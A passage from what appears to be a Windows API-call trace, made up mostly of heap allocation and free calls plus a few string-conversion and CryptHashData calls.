hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0187.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0187.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d68 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0187.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0187.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0187.467] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0187.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0187.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0187.469] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0187.470] CryptHashData (hHash=0xa87510, pbData=0x2e54ef8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0187.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0187.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0187.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0187.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b18 [0187.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0187.472] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0187.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0187.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0187.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0187.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0187.473] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0187.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0187.473] 